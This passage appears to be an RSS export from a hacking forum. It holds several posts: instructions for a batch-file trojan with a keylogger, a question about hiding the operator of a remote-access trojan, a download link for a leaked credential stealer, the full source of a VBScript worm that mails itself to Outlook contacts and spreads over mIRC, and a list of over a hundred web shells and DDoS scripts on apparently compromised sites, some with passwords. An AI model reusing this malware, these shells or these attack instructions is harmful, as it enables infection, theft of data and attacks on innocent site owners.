x86/C&#58;\Windows/A3dC.bat -c 10 -o a3dc.bat<br>if \&quot;%DATE&#58;~1,1%\&quot;==\&quot;12/31\&quot; call C&#58;\Program Files\Alwil Software\Avast4\ahsecurity.dll </pre></div><br><br><br>READ THIS<br>How to set up:<br>Drag A3dC.bat into windows before installing avast<br>Open Ahrunsecurity.dll with wordpad and where you see "1,1" edit it to the current or when u want it to run the virus. Date Example:2003 will be  "0,3"<br>then the date to start up is "12/30" edit it to the date you want Date example: I want it to run on the first of january so it will be "1,1"<br><br>INSTALL AVAST THEN WHEN IT ASK'S YOU TO RUN RIGHT NOW SAY NO/SELECT NO<br>THEN RIGHT CLICK AVAST HIT FIND TARGET INSTALL THE DLL<br>THEN JUST WAIT<br><br><br>DO NOT INSTALL THIS WITH THE .DLL AND .BAT<br>MAKE SURE YOU DONT OPEN THE .BAT<br><br><br>KEYLOGGER INSIDE THE .BAT<br>KEYLOGGER IS IN WINDOWS<br>NAME: Serial.txt<br><br><br>SHUTS OFF INTERNET AND MOUSE AND KEYBOARD AND CD ROM AND PROTECTS FILE FROM EDIT'S AND DOSENT ALLOW USB AND DISABLE'S KEYBOARD,MOUSECLICKS, AND MOUSE!<br><br><br>OLD DOWNLOAD:<br>LINK: <span>WARNING I AM NOT RESPONSIBLE FOR ANY DAMAGE OR HARDWARE FAILURE </span><br>RegTweak [BETA OLD]<br>Download is beta input the script and make it yourself I am to lazy to upload it.<br><br>MUST HAVE RAR<br><br>Good to take down enemy's<br><br>Keylogger<br>BAT/KillAll.psa<br>Trojan.BAT.Delete.DA<br>Trojan.Disablereg<br>Trojan.BAT.Delete.DA<br>Trojan.BAT.Delete.DA<br>Trojan.Win32.Agent.pp<br>Trojan.BAT.Delete.DA<br><br>YOUR OWN RISKS]]></description>
   </item>
   <item>
      <title>Rat TraceBack?</title>
      <link>http://iexploit.org/index.php?p=/discussion/2512/rat-traceback</link>
      <pubDate>Thu, 17 Mar 2011 05:02:46 -0400</pubDate>
      <dc:creator>Corrosion</dc:creator>
      <guid isPermaLink="false">2512@/index.php?p=/discussions</guid>
      <description><![CDATA[I've worked with different rats before, mostly Poision Ivy....<br />My biggest issue with deploying one is that I worry that it would be traced back....<br /><br />If I have to specify an ip address for the server to connect to then I must send it to myself, I could forward it from another service but it'd still get to me...<br /><br />I've thought about an ssh tunnel over to a vps then over to myself, but again if I did that then they'd have my billing info from the vps..<br /><br />So what do you guys do in order to connect with your servers without getting traced back, oh... not to mention I'd like to be able to connect from different remote locations...]]></description>
   </item>
   <item>
      <title>iStealer 6.3</title>
      <link>http://iexploit.org/index.php?p=/discussion/1952/istealer-6-3</link>
      <pubDate>Wed, 29 Dec 2010 21:46:33 -0500</pubDate>
      <dc:creator>undead</dc:creator>
      <guid isPermaLink="false">1952@/index.php?p=/discussions</guid>
      <description><![CDATA[http&#58;//img526&#46;imageshack&#46;us/img526/942/istealer1&#46;png<br><br>Download:<br><a class="postlink" rel="nofollow" href="http://uppit.com/3yn0x9b2jf73/iStealer_6.3_Legends.rar">http://uppit.com/3yn0x9b2jf73/iStealer_6.3_Legends.rar</a><br><br>Virus Scan: <a class="postlink" rel="nofollow" href="http://vscan.novirusthanks.org/analysis/41547f39464e8f6feb21410634cd3d07/aXN0ZWFsZXItNi0zLWxlZ2VuZHMtcmFy/">http://vscan.novirusthanks.org/analysis ... uZHMtcmFy/</a><br><br>Leaked By Blair]]></description>
   </item>
   <item>
      <title>Analyzing a vbs Worm</title>
      <link>http://iexploit.org/index.php?p=/discussion/2464/analyzing-a-vbs-worm</link>
      <pubDate>Thu, 10 Mar 2011 16:12:59 -0500</pubDate>
      <dc:creator>m0rph</dc:creator>
      <guid isPermaLink="false">2464@/index.php?p=/discussions</guid>
      <description><![CDATA[<div class="PreContainer"><pre>#############################################################<br>#<br>#     This is what I like to call the \&quot;head\&quot; of the worm<br>#<br>#############################################################<br><br>Set O6734VC6 = createobject(\&quot;scripting&amp;#46;filesystemobject\&quot;)<br>O78SS2L7 = O6734VC6&amp;#46;getspecialfolder(1)<br>A6G1HQFH = O78SS2L7 &amp; \&quot;geilfingeren&amp;#46;jpg&amp;#46;vbs\&quot;<br>Set E828D4O2 = createobject(\&quot;wscript&amp;#46;shell\&quot;)<br>E828D4O2&amp;#46;regwrite \&quot;HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate\&quot;, \&quot;wscript&amp;#46;exe \&quot; &amp; A6G1HQFH &amp; \&quot; %\&quot;<br>O6734VC6&amp;#46;copyfile wscript&amp;#46;scriptfullname, A6G1HQFH<br>UB51PCQU<br>If E828D4O2&amp;#46;regread(\&quot;HKLMSOFTWAREMicrosoftWindowsCurrentVersionfingeren&amp;#46;aviUA1OM5IA\&quot;) &amp;lt;&amp;gt; 1 then<br>KD8F5L2N<br>End if<br>If E828D4O2&amp;#46;regread(\&quot;HKLMSOFTWAREMicrosoftWindowsCurrentVersionfingeren&amp;#46;aviD47AC8NJ\&quot;) &amp;lt;&amp;gt; 1 then<br>HLVO1EDH \&quot;\&quot;<br>End if<br><br>#############################################################<br>#<br>#       The next part I like to refer to as the \&quot;body\&quot;<br># <br>#############################################################<br>Function KD8F5L2N()<br>Set O13Q767K = CreateObject(\&quot;Outlook&amp;#46;Application\&quot;)<br>If O13Q767K = \&quot;Outlook\&quot; Then<br>Set LFSIH230 = O13Q767K&amp;#46;GetNameSpace(\&quot;MAPI\&quot;)<br>Set LLLK4LPL = LFSIH230&amp;#46;AddressLists<br>For Each A4A83865 In LLLK4LPL<br>If A4A83865&amp;#46;AddressEntries&amp;#46;Count &amp;lt;&amp;gt; 0 Then<br>JM1R7N44 = A4A83865&amp;#46;AddressEntries&amp;#46;Count<br>For NHF463JD = 1 To JM1R7N44<br>Set OU435GC5 = O13Q767K&amp;#46;CreateItem(0)<br>Set KP511I06 = A4A83865&amp;#46;AddressEntries(NHF463JD)<br>OU435GC5&amp;#46;To = KP511I06&amp;#46;Address<br>OU435GC5&amp;#46;Subject = \&quot;Very Important!\&quot;<br>OU435GC5&amp;#46;Body = \&quot;Hi&amp;#58;\&quot; &amp; vbcrlf &amp; \&quot;Please view this file, it's very important&amp;#46;\&quot; &amp; vbcrlf &amp; \&quot;\&quot;<br>execute \&quot;set DH97CAIN =OU435GC5&amp;#46;\&quot; &amp; Chr(65) &amp; Chr(116) &amp; Chr(116) &amp; Chr(97) &amp; Chr(99) &amp; Chr(104) &amp; Chr(109) &amp; Chr(101) &amp; Chr(110) &amp; Chr(116) &amp; Chr(115)<br>IJ15SDEE = A6G1HQFH<br>OU435GC5&amp;#46;DeleteAfterSubmit = True<br>DH97CAIN&amp;#46;Add IJ15SDEE<br>If OU435GC5&amp;#46;To &amp;lt;&amp;gt; \&quot;\&quot; Then<br>OU435GC5&amp;#46;Send<br>End If<br>Next<br>End If<br>Next<br>End If<br>End function<br>Function HLVO1EDH(AHAOA819)<br>If AHAOA819 &amp;lt;&amp;gt; \&quot;\&quot; Then<br>TJTE98P3 = E828D4O2&amp;#46;regread(\&quot;HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir\&quot;)<br>If O6734VC6&amp;#46;fileexists(\&quot;c&amp;#58;mircmirc&amp;#46;ini\&quot;) Then<br>AHAOA819 = \&quot;c&amp;#58;mirc\&quot;<br>ElseIf O6734VC6&amp;#46;fileexists(\&quot;c&amp;#58;mirc32mirc&amp;#46;ini\&quot;) Then<br>AHAOA819 = \&quot;c&amp;#58;mirc32\&quot;<br>ElseIf O6734VC6&amp;#46;fileexists(TJTE98P3 &amp; \&quot;mircmirc&amp;#46;ini\&quot;) Then<br>AHAOA819 = TJTE98P3 &amp; \&quot;mirc\&quot;<br>ElseIf O6734VC6&amp;#46;fileexists(TJTE98P3 &amp; \&quot;mirc32mirc&amp;#46;ini\&quot;) Then<br>AHAOA819 = TJTE98P3 &amp; \&quot;mirc\&quot;<br>Else<br>AHAOA819 = \&quot;\&quot;<br>End If<br>End If<br>If AHAOA819 &amp;lt;&amp;gt; \&quot;\&quot; Then<br>Set U127MJ5H = O6734VC6&amp;#46;CreateTextFile(AHAOA819 &amp; \&quot;script&amp;#46;ini\&quot;, True)<br>U127MJ5H = \&quot;&amp;#91;script&amp;#93;\&quot; &amp; vbCrLf &amp; \&quot;n0=on 1&amp;#58;JOIN&amp;#58;#&amp;#58;{\&quot;<br>U127MJ5H = U127MJ5H &amp; vbCrLf &amp; \&quot;n0=on 1&amp;#58;JOIN&amp;#58;#&amp;#58;{\&quot;<br>U127MJ5H = U127MJ5H &amp; vbCrLf &amp; \&quot;n1=  /if ( $nick == $me ) { halt }\&quot;<br>U127MJ5H = U127MJ5H &amp; vbCrLf &amp; \&quot;n2=  /&amp;#46;\&quot; &amp; Chr(100) &amp; Chr(99) &amp; Chr(99) &amp; \&quot; send $nick \&quot;<br>U127MJ5H = U127MJ5H &amp; A6G1HQFH<br>U127MJ5H = U127MJ5H &amp; vbCrLf &amp; \&quot;n3=}\&quot;<br>script&amp;#46;Close<br>End If<br>End Function<br>Function J706734V()<br>On Error Resume Next<br>Set CKQ24CHB = O6734VC6&amp;#46;Drives<br>For Each G2U828D4 In CKQ24CHB<br>OC078SS2 = G2U828D4 &amp; \&quot;  \&quot;<br>Call L7R6G1HQ(OC078SS2)<br>Next<br>End Function<br><br>Function L7R6G1HQ(FS6B51PC)<br>Q35A1OM5 = FS6B51PC<br>Set ITHD8F5L = O6734VC6&amp;#46;GetFolder(Q35A1OM5)<br>Set G6F47AC8 = ITHD8F5L&amp;#46;Files<br>For Each NFFLVO1E In G6F47AC8<br>If lcase(NFFLVO1E&amp;#46;Name) = \&quot;mirc&amp;#46;ini\&quot; Then<br>HLVO1EDH(NFFLVO1E&amp;#46;ParentFolder)<br>End If<br>If O6734VC6&amp;#46;GetExtensionName(NFFLVO1E&amp;#46;path) = \&quot;vbs\&quot;<br>O6734VC6&amp;#46;CopyFile wscript&amp;#46;scriptfullname,NFFLVO1E&amp;#46;path,true<br>End if<br>If O6734VC6&amp;#46;GetExtensionName(NFFLVO1E&amp;#46;path) = \&quot;vbe\&quot;<br>O6734VC6&amp;#46;CopyFile wscript&amp;#46;scriptfullname,NFFLVO1E&amp;#46;path,true<br>End if<br>Next<br>Set VSM3BL08 = ITHD8F5L&amp;#46;Subfolders<br>For Each UQFA0DCQ In VSM3BL08<br>Call (UQFA0DCQ&amp;#46;path)<br>Next<br>End function<br><br><br>#############################################################<br>#<br>#         and finally the \&quot;tail\&quot; so to speak&amp;#46;<br>#<br>#############################################################<br><br><br>Function UB51PCQU()<br>Randomize<br>If 1 + Int(Rnd * 50) = 7 then<br>E828D4O2&amp;#46;run \&quot;RUNDLL32&amp;#46;EXE user&amp;#46;exe,exitwindows\&quot;<br>end if<br>end function <br><br>####################### End of Code #########################</pre></div><br>In the head of the worm, it first it writes itself to the Windows Update directory as a value for "wscript.exe" from the registry for<br>all accounts on the machine as seen by the root directory of "HKLM" or HKEY_LOCAL_MACHINE. And procedes to read values from <br>"fingeren.avi" to execute other functions within itself. This results in the worm being executed everytime Windows Update is initiated.<br><br>In the body of the worm, it targets the Microsoft Outlook application as a form of propagating itself.<br>It first registers Microsoft Outlook as an extension to the worm itself, by reading all of the contacts within one's address list. It<br>then enumerates the addresses in a numerical order for creating an email to attach itself to. Once all of the emails it created have been<br>sent out, it deletes them from Microsoft Outlook, so when the user logs in, he or she doesn't see any suspicious info.<br><br>The next function in the body looks for a file called "mirc.ini" from what we as hackers know about malicious software, we can only assume it<br>is refering to an Internet Relay Chat server as described within. After it reads the assumed irc server within the mirc.ini script it connects to <br>it under a random nickname where the owner of this worm can send commands to it. We can assume the commands defined by this worm are written in <br>a file called "script.ini" seeing as this function listens for commands under a variable defined as "script"<br><br>The next function function appears to mount drives and folders on the local system. I'm not entirely positive but it looks to me as the next <br>function attempts to create copies of the "mirc.ini" file. Of which I would think would give it more options to connect to the IRC server<br>in the event of one of the "mirc.ini" files being deleted. It then appears to me that it copies the worm itself to all folders associated <br>with a "mirc.ini" file.<br><br>In the footer, I'm once again assuming that the code attempts to read the registry entries it made under the current user logged in. But, once <br>again this may not be correct.<br><br>My thoughts:<br>I dont know for sure, but I think this is a variant of the "ILUVYOU" virus. In its current state it doesn't work, because there's no function <br>to create the "mirc.ini" file. There's also no function that either creates, or defines within itself the commands that are to be found in<br>"script.exe" for its communication with an IRC server. Also "user.exe" was discontinued from the cab file directory after Windows 2000.<br>So not only will this not work, but it's also outdated. <br><br>On a side note: <br>VBscript is still supported in Windows 7, so if this code were completed by someone who knew how to write vbs very well, and<br>rewritten in the last couple of statements so it ran itself under the current user's priviledges as described in newer versions<br>of the Windows operating system, this worm could work. But one would also have to worry about reverse engineering tactics employed<br>against this. Maybe the use of an encryption algorithm for protecting connection information being sent to the IRC server would suffice?<br><br>This uses old school tactics, the kind of stuff the hardcore elite in the generation of hackers before ours used, back when direct<br>attacks were almost null and writing programs like this was the rage. I find this a very interesting set of code, and a great place<br>for malicious programmers to draw ideas and inspiration from when creating new projects.<br><br>m0rph]]></description>
   </item>
   <item>
      <title>100+DDoS shells</title>
      <link>http://iexploit.org/index.php?p=/discussion/1481/100-ddos-shells</link>
      <pubDate>Sat, 23 Oct 2010 23:18:50 -0400</pubDate>
      <dc:creator>SomethingMAD</dc:creator>
      <guid isPermaLink="false">1481@/index.php?p=/discussions</guid>
      <description><![CDATA[<a class="postlink" rel="nofollow" href="http://seawiser.com/indexfixer.php">http://seawiser.com/indexfixer.php</a><br><a class="postlink" rel="nofollow" href="http://amit.dabydeen.com/indexfixer.php">http://amit.dabydeen.com/indexfixer.php</a><br><a class="postlink" rel="nofollow" href="http://ma77o.info/shell/77shell/shell.php">http://ma77o.info/shell/77shell/shell.php</a><br><a class="postlink" rel="nofollow" href="http://www.tpoly.edu.gh/indexfixer.php">http://www.tpoly.edu.gh/indexfixer.php</a><br><a class="postlink" rel="nofollow" href="http://riadcaidrassou.com/xyiznwsk/shelly.php">http://riadcaidrassou.com/xyiznwsk/shelly.php</a><br><a class="postlink" rel="nofollow" href="http://shelly.hostzi.com/index.php">http://shelly.hostzi.com/index.php</a><br><a class="postlink" rel="nofollow" href="http://atlantics.ca/dos.php?act=phptools...38&amp;time=15">http://atlantics.ca/dos.php?act=phptools...38&amp;time=15</a><br><a class="postlink" rel="nofollow" href="http://shells.red-pill.eu/">http://shells.red-pill.eu/</a><br><a class="postlink" rel="nofollow" href="http://download.phpzilla.net/">http://download.phpzilla.net/</a><br><a class="postlink" rel="nofollow" href="http://ourladyofpillar.org/css/sickdos.php">http://ourladyofpillar.org/css/sickdos.php</a> &lt;-- pass: Blk142<br><a class="postlink" rel="nofollow" href="http://ourladyofpillar.org/css/httpdos.php">http://ourladyofpillar.org/css/httpdos.php</a> &lt;-- http, pass: test (use <a class="postlink" rel="nofollow" href="http://target.com/">http://target.com/</a>, not IP)<br><a class="postlink" rel="nofollow" href="http://dos-shell.us.to/">http://dos-shell.us.to/</a> &lt;-- pass: hf_free21<br><a class="postlink" rel="nofollow" href="http://194.110.192.121/xmlrpc/includes/shell.php">http://194.110.192.121/xmlrpc/includes/shell.php</a><br><a class="postlink" rel="nofollow" href="http://www.xgclan.org/dos/dos.php">http://www.xgclan.org/dos/dos.php</a><br><a class="postlink" rel="nofollow" href="http://tuzick.co.cc/tuzickadmin/shell.php">http://tuzick.co.cc/tuzickadmin/shell.php</a><br><a class="postlink" rel="nofollow" href="http://tuzick.co.cc/Public%20SHared/">http://tuzick.co.cc/Public%20SHared/</a><br><a class="postlink" rel="nofollow" href="http://www.silkpetals.net/images/footer/boot.php">http://www.silkpetals.net/images/footer/boot.php</a><br><a class="postlink" rel="nofollow" href="http://strelok.site50.net/">http://strelok.site50.net/</a> &lt;-- 10 sec limit, 50000 p/s<br><a class="postlink" rel="nofollow" href="http://dos-1.netii.net/">http://dos-1.netii.net/</a><br><a class="postlink" rel="nofollow" href="http://www.inchoates.com/smf/index.php?action=forum&amp;">http://www.inchoates.com/smf/index.php?action=forum&amp;</a><br><a class="postlink" rel="nofollow" href="http://testvbulletin.bplaced.net/dos/index.php">http://testvbulletin.bplaced.net/dos/index.php</a>?<br><a class="postlink" rel="nofollow" href="http://www.elfstedentocht-online.info/">http://www.elfstedentocht-online.info/</a><br><a class="postlink" rel="nofollow" href="http://www.jinketek.com/admin/">http://www.jinketek.com/admin/</a>?<br><a class="postlink" rel="nofollow" href="http://www.phpdos.seite.com/">http://www.phpdos.seite.com/</a><br><a class="postlink" rel="nofollow" href="http://rt65.prv.pl/">http://rt65.prv.pl/</a><br><a class="postlink" rel="nofollow" href="http://base-killer.site90.net/">http://base-killer.site90.net/</a><br><a class="postlink" rel="nofollow" href="http://css-c.net76.net/">http://css-c.net76.net/</a><br><a class="postlink" rel="nofollow" href="http://www.faab-pictures.com/">http://www.faab-pictures.com/</a><br><a class="postlink" rel="nofollow" href="http://www.regab666.gigfa.com/">http://www.regab666.gigfa.com/</a><br><a class="postlink" rel="nofollow" href="http://marocmix.idoo.com/">http://marocmix.idoo.com/</a><br><a class="postlink" rel="nofollow" href="http://quickscop3z.com/DDoS/">http://quickscop3z.com/DDoS/</a><br><a class="postlink" rel="nofollow" href="http://kmy4888.hostei.com/">http://kmy4888.hostei.com/</a><br><a class="postlink" rel="nofollow" href="http://www.inchoates.com/smf/index.php">http://www.inchoates.com/smf/index.php</a><br><a class="postlink" rel="nofollow" href="http://lol123.net16.net/">http://lol123.net16.net/</a><br><a class="postlink" rel="nofollow" href="http://www.hjpub.co.kr/fs/2008/s_freeboa...et=0.0.0.0">http://www.hjpub.co.kr/fs/2008/s_freeboa...et=0.0.0.0</a><br><a class="postlink" rel="nofollow" href="http://hrssaipan.com/bbs_data/dos.php?target=0.0.0.0">http://hrssaipan.com/bbs_data/dos.php?target=0.0.0.0</a><br><a class="postlink" rel="nofollow" href="http://www.towericerink.co.kr/webboard/f...et=0.0.0.0">http://www.towericerink.co.kr/webboard/f...et=0.0.0.0</a><br><a class="postlink" rel="nofollow" href="http://www.jhroof.com/kboard/data/sub_e_...et=0.0.0.0">http://www.jhroof.com/kboard/data/sub_e_...et=0.0.0.0</a><br><a class="postlink" rel="nofollow" href="http://www.gipot.net/mkslt/datafile/1337...et=0.0.0.0">http://www.gipot.net/mkslt/datafile/1337...et=0.0.0.0</a><br><a class="postlink" rel="nofollow" href="http://coboclub.com/upload/2008_06/1337....et=0.0.0.0">http://coboclub.com/upload/2008_06/1337....et=0.0.0.0</a><br><a class="postlink" rel="nofollow" href="http://1004kiss.co.kr/bbs/table/qna/uplo...et=0.0.0.0">http://1004kiss.co.kr/bbs/table/qna/uplo...et=0.0.0.0</a><br><a class="postlink" rel="nofollow" href="http://www.unclecom.com/Data/uncle/Board...rget=0.0.0">http://www.unclecom.com/Data/uncle/Board...rget=0.0.0</a><br><a class="postlink" rel="nofollow" href="http://www.rocksecuritycams.741.com/ddos.php">http://www.rocksecuritycams.741.com/ddos.php</a> (credits: Shi?osa?i. â„¢)<br><a class="postlink" rel="nofollow" href="http://centralcomputers.ca/fattwam/index.php">http://centralcomputers.ca/fattwam/index.php</a> &lt;-- user: hackforums pass: fattwam (credits: fattwam)<br><a class="postlink" rel="nofollow" href="http://rt65.prv.pl/">http://rt65.prv.pl/</a><br><a class="postlink" rel="nofollow" href="http://sxleton.awardspace.us/">http://sxleton.awardspace.us/</a><br><a class="postlink" rel="nofollow" href="http://dcpglitcher.netne.net/">http://dcpglitcher.netne.net/</a><br><a class="postlink" rel="nofollow" href="http://www.pchonor.gigfa.com/">http://www.pchonor.gigfa.com/</a><br><a class="postlink" rel="nofollow" href="http://dapache.hi2.ro/?page=pscan">http://dapache.hi2.ro/?page=pscan</a><br><a class="postlink" rel="nofollow" href="http://www.cadence.com.br/fotos/">http://www.cadence.com.br/fotos/</a><br><a class="postlink" rel="nofollow" href="http://starneox.comuf.com/dos/">http://starneox.comuf.com/dos/</a><br><a class="postlink" rel="nofollow" href="http://smsblack.bplaced.net/sms//l-s.php">http://smsblack.bplaced.net/sms//l-s.php</a><br><a class="postlink" rel="nofollow" href="http://h4ck3rs.eu.pn/ddos.php">http://h4ck3rs.eu.pn/ddos.php</a><br><a class="postlink" rel="nofollow" href="http://ddos.99k.org/">http://ddos.99k.org/</a><br><a class="postlink" rel="nofollow" href="http://download.phpzilla.net/">http://download.phpzilla.net/</a><br><a class="postlink" rel="nofollow" href="http://www.rocksecuritycams.741.com/ddos.php">http://www.rocksecuritycams.741.com/ddos.php</a><br><a class="postlink" rel="nofollow" href="http://h1.Spam.com/machoxtaco/Progs/Shombdg/">http://h1.Spam.com/machoxtaco/Progs/Shombdg/</a><br><a class="postlink" rel="nofollow" href="http://electrics.vacau.com/">http://electrics.vacau.com/</a><br><a class="postlink" rel="nofollow" href="http://uulu.freeiz.com/">http://uulu.freeiz.com/</a><br><a class="postlink" rel="nofollow" href="http://k1x-hook.com/">http://k1x-hook.com/</a><br><a class="postlink" rel="nofollow" href="http://aura.host56.com/">http://aura.host56.com/</a><br><a class="postlink" rel="nofollow" href="http://blog.oxfordoutcomes.net/dDos/">http://blog.oxfordoutcomes.net/dDos/</a><br><a class="postlink" rel="nofollow" href="http://dapache.hi2.ro/">http://dapache.hi2.ro/</a><br><a class="postlink" rel="nofollow" href="http://bkontakte.hut.ru/">http://bkontakte.hut.ru/</a><br><a class="postlink" rel="nofollow" href="http://m4rky0.freei.me/">http://m4rky0.freei.me/</a><br><a class="postlink" rel="nofollow" href="http://clubedapegada.net/">http://clubedapegada.net/</a><br><a class="postlink" rel="nofollow" href="http://www.framedgamers.com/dos/">http://www.framedgamers.com/dos/</a><br><a class="postlink" rel="nofollow" href="http://lolphp.netai.net/">http://lolphp.netai.net/</a><br><a class="postlink" rel="nofollow" href="http://www.jnapple.net/index.php">http://www.jnapple.net/index.php</a><br><a class="postlink" rel="nofollow" href="http://www.regab666.gigfa.com/">http://www.regab666.gigfa.com/</a><br><a class="postlink" rel="nofollow" href="http://pazzaapparel.com/dos.php">http://pazzaapparel.com/dos.php</a><br><a class="postlink" rel="nofollow" href="http://www.dos-test.www4.me/dos/dos.php">http://www.dos-test.www4.me/dos/dos.php</a><br><a class="postlink" rel="nofollow" href="http://www.eft-tapping.net/shell.php">http://www.eft-tapping.net/shell.php</a><br><a class="postlink" rel="nofollow" href="http://menzow.com/shell.php?act=phptools">http://menzow.com/shell.php?act=phptools</a><br><a class="postlink" rel="nofollow" href="http://www.flaggfabrikken.com/">http://www.flaggfabrikken.com/</a><br><a class="postlink" rel="nofollow" href="http://millsrock.all.co.uk/shell.php">http://millsrock.all.co.uk/shell.php</a><br><a class="postlink" rel="nofollow" href="http://eros.vlo.gda.pl/~valacar/files/er...x=phptools">http://eros.vlo.gda.pl/~valacar/files/er...x=phptools</a><br><a class="postlink" rel="nofollow" href="http://www.regab666.gigfa.com/">http://www.regab666.gigfa.com/</a><br><a class="postlink" rel="nofollow" href="http://pazzaapparel.com/dos.php">http://pazzaapparel.com/dos.php</a><br><a class="postlink" rel="nofollow" href="http://www.dos-test.www4.me/dos/dos.php">http://www.dos-test.www4.me/dos/dos.php</a><br><a class="postlink" rel="nofollow" href="http://www.eft-tapping.net/shell.php">http://www.eft-tapping.net/shell.php</a><br><a class="postlink" rel="nofollow" href="http://menzow.com/shell.php?act=phptools">http://menzow.com/shell.php?act=phptools</a><br><a class="postlink" rel="nofollow" href="http://www.flaggfabrikken.com/">http://www.flaggfabrikken.com/</a><br><a class="postlink" rel="nofollow" href="http://millsrock.all.co.uk/shell.php">http://millsrock.all.co.uk/shell.php</a><br><a class="postlink" rel="nofollow" href="http://eros.vlo.gda.pl/~valacar/files/er...x=phptools">http://eros.vlo.gda.pl/~valacar/files/er...x=phptools</a><br><a class="postlink" rel="nofollow" href="http://h1.Spam.com/machoxtaco/Progs/Somh.php">http://h1.Spam.com/machoxtaco/Progs/Somh.php</a><br><a class="postlink" rel="nofollow" href="http://www.congresso8.zobyhost.com/r20x.php">http://www.congresso8.zobyhost.com/r20x.php</a><br><a class="postlink" rel="nofollow" href="http://colour-comic.com/indexfixer.php">http://colour-comic.com/indexfixer.php</a><br><a class="postlink" rel="nofollow" href="http://africaevasion.com/needed.php">http://africaevasion.com/needed.php</a><br><a class="postlink" rel="nofollow" href="http://peer-egm.de/dwsync.php">http://peer-egm.de/dwsync.php</a><br><a class="postlink" rel="nofollow" href="http://godfi.com/indexfixer.php">http://godfi.com/indexfixer.php</a><br><a class="postlink" rel="nofollow" href="http://www.chinahoner.cn/antu.php">http://www.chinahoner.cn/antu.php</a><br><a class="postlink" rel="nofollow" href="http://computerdealer.co.nz/indexfixer.php">http://computerdealer.co.nz/indexfixer.php</a><br><a class="postlink" rel="nofollow" href="http://www.globalwedding.designhkweb.com/cgi.php">http://www.globalwedding.designhkweb.com/cgi.php</a><br><a class="postlink" rel="nofollow" href="http://chinahoner.com/antu.php">http://chinahoner.com/antu.php</a><br><a class="postlink" rel="nofollow" href="http://www.globalwedding.designhkweb.com/images/cgi.php">http://www.globalwedding.designhkweb.com/images/cgi.php</a><br><a class="postlink" rel="nofollow" href="http://crane-magnet.com/antu.php">http://crane-magnet.com/antu.php</a><br><a class="postlink" rel="nofollow" href="http://www.limieten.info/images/admin.php">http://www.limieten.info/images/admin.php</a><br><a class="postlink" rel="nofollow" href="http://www.ibk.uk.st/shell1.php">http://www.ibk.uk.st/shell1.php</a><br><a class="postlink" rel="nofollow" href="http://www.grupomyb.com.mx/indexfixer.php">http://www.grupomyb.com.mx/indexfixer.php</a><br><a class="postlink" rel="nofollow" href="http://freehunter.biz/">http://freehunter.biz/</a><br><a class="postlink" rel="nofollow" href="http://grieveauth.webatu.com/">http://grieveauth.webatu.com/</a><br><a class="postlink" rel="nofollow" href="http://grayhat.tk/">http://grayhat.tk/</a><br><a class="postlink" rel="nofollow" href="http://menzow.com/shell.php?act=phptools">http://menzow.com/shell.php?act=phptools</a><br><a class="postlink" rel="nofollow" href="http://www.aboutsignsftp.co.uk/images/">http://www.aboutsignsftp.co.uk/images/</a><br><a class="postlink" rel="nofollow" href="http://frozngaming.com/forums/administrator/..php">http://frozngaming.com/forums/administrator/..php</a><br><a class="postlink" rel="nofollow" href="http://www.dharumavantha.net/forums/admi...rums/..php">http://www.dharumavantha.net/forums/admi...rums/..php</a><br><a class="postlink" rel="nofollow" href="http://geofun.site.ge/?act=phptools">http://geofun.site.ge/?act=phptools</a><br><a class="postlink" rel="nofollow" href="http://www.sureshotgps.com/_pdf/qqq.php">http://www.sureshotgps.com/_pdf/qqq.php</a><br><a class="postlink" rel="nofollow" href="http://lermitage.co.za/includes/require.php">http://lermitage.co.za/includes/require.php</a><br><a class="postlink" rel="nofollow" href="http://designetti.com/archive/require.php">http://designetti.com/archive/require.php</a><br><a class="postlink" rel="nofollow" href="http://www.sonicviewsupport.com/images/require.php">http://www.sonicviewsupport.com/images/require.php</a><br><a class="postlink" rel="nofollow" href="http://lamaisonnouvelle.fr/css/require.php">http://lamaisonnouvelle.fr/css/require.php</a><br><a class="postlink" rel="nofollow" href="http://sxleton.awardspace.us/">http://sxleton.awardspace.us/</a><br><a class="postlink" rel="nofollow" href="http://testvbulletin.bplaced.net/dos/index.php">http://testvbulletin.bplaced.net/dos/index.php</a><br><a class="postlink" rel="nofollow" href="http://ackhydrofarm.com/downloads/">http://ackhydrofarm.com/downloads/</a><br><a class="postlink" rel="nofollow" href="http://wh-u.com:8000/cpanel/ddos.html">http://wh-u.com:8000/cpanel/ddos.html</a><br><a class="postlink" rel="nofollow" href="http://wh-u.com:8000/d_dos.php">http://wh-u.com:8000/d_dos.php</a><br><a class="postlink" rel="nofollow" href="http://www.regab666.gigfa.com/">http://www.regab666.gigfa.com/</a><br><a class="postlink" rel="nofollow" href="http://shelly.hostzi.com/?page=httpflood">http://shelly.hostzi.com/?page=httpflood</a><br><a class="postlink" rel="nofollow" href="http://ebeninki.net/">http://ebeninki.net/</a><br><a class="postlink" rel="nofollow" href="http://aura.host56.com/">http://aura.host56.com/</a><br><a class="postlink" rel="nofollow" href="http://k1x-hook.com/">http://k1x-hook.com/</a><br><a class="postlink" rel="nofollow" href="http://www.orimikomi.be/dos/">http://www.orimikomi.be/dos/</a><br><a class="postlink" rel="nofollow" href="http://freehunter.biz/">http://freehunter.biz/</a><br><a class="postlink" rel="nofollow" href="http://www.rocksecuritycams.741.com/ddos.php">http://www.rocksecuritycams.741.com/ddos.php</a><br><a class="postlink" rel="nofollow" href="http://d-dos.50webs.com/ddos.php">http://d-dos.50webs.com/ddos.php</a><br><a class="postlink" rel="nofollow" href="http://sxleton.awardspace.us">http://sxleton.awardspace.us</a><br><a class="postlink" rel="nofollow" href="http://download.phpzilla.net/">http://download.phpzilla.net/</a><br><a class="postlink" rel="nofollow" href="http://uulu.freeiz.com/">http://uulu.freeiz.com/</a><br><a class="postlink" rel="nofollow" href="http://www.webpublishingexperts.com/gene.../caroline/">http://www.webpublishingexperts.com/gene.../caroline/</a><br><a class="postlink" rel="nofollow" href="http://h4ck3rs.eu.pn/ddos.php">http://h4ck3rs.eu.pn/ddos.php</a><br><a class="postlink" rel="nofollow" href="http://peer-egm.de/dwsync.php">http://peer-egm.de/dwsync.php</a><br><a class="postlink" rel="nofollow" href="http://kombucha-shop.fr/php/dwsync.php">http://kombucha-shop.fr/php/dwsync.php</a><br><a class="postlink" rel="nofollow" href="http://www.jnapple.net/index.php">http://www.jnapple.net/index.php</a><br><a class="postlink" rel="nofollow" href="http://serturplastik.com/xdp.php">http://serturplastik.com/xdp.php</a><br><a class="postlink" rel="nofollow" href="http://trieksis.com/xdp.php">http://trieksis.com/xdp.php</a><br><a class="postlink" rel="nofollow" 